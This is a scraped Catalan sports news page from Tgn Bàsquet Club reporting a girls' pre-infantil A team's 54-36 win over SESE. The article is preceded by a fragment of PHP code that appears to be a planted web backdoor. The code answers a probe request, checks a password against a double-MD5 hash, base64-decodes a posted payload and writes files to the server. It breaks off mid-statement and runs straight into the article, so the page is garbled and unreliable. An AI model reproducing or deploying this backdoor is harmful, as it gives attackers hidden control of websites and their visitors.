function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El preinfantil femení A fa uns grans primers trenta minuts i s'imposa al SESE (54-36) - Tgn Bàsquet Club -

El preinfantil femení A fa uns grans primers trenta minuts i s’imposa al SESE (54-36)

Updated: novembre 6, 2018

L’equip preinfantil femení A del TGN Bàsquet va derrotar clarament el SESE en un partit dominat per les locals des de l’inici. El començament del matx de les tarragonines va ser molt bo, obrint forat de seguida i al descans el resultat era de 35-14. L’avantatge es va ampliar quan faltaven deu minuts pel final (49-19) però aleshores el SESE va reaccionar i va retallar distàncies, tot i que la victòria no va perillar en cap moment.